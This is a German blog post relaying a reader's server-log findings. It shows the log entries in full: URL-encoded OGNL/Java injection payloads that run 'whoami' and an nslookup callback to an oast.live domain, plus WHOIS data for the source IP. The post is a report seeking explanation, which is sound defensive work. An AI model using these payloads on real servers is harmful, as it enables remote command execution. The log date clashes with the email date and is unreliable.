![\"Sicherheit](\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2021\/04\/Sicherheit_klein.jpg\" "\\"Sicherheit")
Ich stelle mal einen Sachverhalt hier im Blog ein, auf den ich mir noch keinen finalen Reim machen kann. Einem Benutzer ist beim Auswerten seiner Server-Log-Dateien aufgefallen, dass es immer wieder Versuche gibt, eine bestimmte Datei von diesem Webserver herunter zu laden. Spontan tippe ich darauf, dass da irgend eine Schwachstelle ausgekundschaftet werden soll.<\/p>\n
<\/p>\n
Blog-Leser Wolfgang O. hat mich zum 9. Juni 2023 per Mail bez\u00fcglich des Themas kontaktiert, ich komme aber erst jetzt dazu, das Ganze hier im Blog einzustellen. Wolfgang schrieb:<\/p>\n
Seltsamkeit in Server-Log<\/strong><\/p>\n
Hallo G\u00fcnter,<\/p>\n
heute habe ich im Log meines Servers etwas f\u00fcr mich noch unbekanntes
\nentdeckt. Jemand hat versucht, folgende \"Datei\" herunterzuladen:<\/p>\nhddps:\u00a0 \/\/mein. webserver . de\/${(#a=@org . apache.commons . io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"whoami\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"<\/a>X-Cmd-Response\",#a))}<\/code><\/pre>\nIm Log steht dazu folgender Eintrag:<\/p>\n
GET \/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D\/ \r\nHTTP\/1.1 \r\nHost: n.n.n.n \r\nUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_10_1) \r\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2227.1 Safari\/537.36 \r\nConnection: close \r\nAccept: *\/* \r\nAccept-Language: en \r\nAccept-Encoding: gzip \r\n08.06.2026 um 13:57:21 <\/code><\/pre>\nDann, eine Sekunde sp\u00e4ter und mit anderem User-Agent:<\/p>\n
\r\nGET \/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20ci1h73pgd9ul7vo9lsog8mbibj7cm8omc.oast.live%22%29%7D\/ \r\nHTTP\/1.1 \r\nHost: n.n.n.n \r\nUser-Agent: Mozilla\/5.0 (Windows NT 5.1) AppleWebKit\/537.36 (KHTML, like \r\nGecko) Chrome\/34.0.1866.237 Safari\/537.36 \r\nConnection: close \r\nAccept: *\/* \r\nAccept-Language: en \r\nAccept-Encoding: gzip <\/code><\/pre>\nf\u00fcr diese \"Datei\":<\/p>\n
hddps : \/\/mein. webserver. de\/${@java.lang.Runtime@getRuntime().exec(\"nslookupci1h73pgd9ul7vo9lsog8mbibj7cm8omc.oast.live\")}<\/code><\/pre>\nIn beiden F\u00e4llen kam der Besucher von folgender IP-Adresse:<\/p>\n
WHOIS Source: RIPE NCC
\nIP Address:\u00a0\u00a0 45.83.123.30
\nCountry:\u00a0\u00a0\u00a0\u00a0\u00a0 Netherlands
\nNetwork Name: LXD
\nOwner Name:
\nCIDR:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 45.83.122.0\/23
\n>From IP:\u00a0\u00a0\u00a0\u00a0\u00a0 45.83.122.0
\nTo IP:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 45.83.123.255
\nAllocated:\u00a0\u00a0\u00a0 Yes
\nContact Name: Rea Ketty
\nAddress:\u00a0\u00a0\u00a0\u00a0\u00a0 SEYCHELLES, Mahe, 1111, House of Francis, Room 303, IIe Du
\nPort
\nEmail:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 abuse.itweb@gmail.com<\/a>
\nAbuse Email:\u00a0 abuse.itweb@gmail.com<\/a>
\nPhone:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 +14708099233
\nFax:<\/p>\nEine erste schnelle Suche bei Google hat nichts ergeben. Ecosia hat die Suche geblockt (\"Suspicious\").<\/p>\n
Ist das was Neues?<\/p>\n
Falls ja, vielleicht hast Du ja jemanden, den das interessieren k\u00f6nnte. Ich selber kenne da niemanden. Ich habe im \u00fcbrigen alle Verweise auf meinen Server anonymisiert. Er steht bei HostEurope, ein selbstgeschriebener Webserver, deshalb liefen die Versuche mit Apache und Java ins Leere. Ansonsten h\u00e4tte der Besucher wohl mehr versucht. Vermutung meinerseits.<\/p>\n
Mal schauen, ob die Mail wegen der eingebetteten Links \u00fcberhaupt durch den Spamfilter kommt. Deshalb habe ich das da oben jeweils am Anfang\u00a0 zerst\u00fcckelt.<\/p>\n
Danke f\u00fcrs Lesen und dann noch ein sch\u00f6nes Wochenende<\/p><\/blockquote>\n
Frage an die Leserschaft: Kann sich jemand einen Reim darauf machen?<\/p>\n","protected":false},"excerpt":{"rendered":"
Ich stelle mal einen Sachverhalt hier im Blog ein, auf den ich mir noch keinen finalen Reim machen kann. Einem Benutzer ist beim Auswerten seiner Server-Log-Dateien aufgefallen, dass es immer wieder Versuche gibt, eine bestimmte Datei von diesem Webserver herunter … Weiterlesen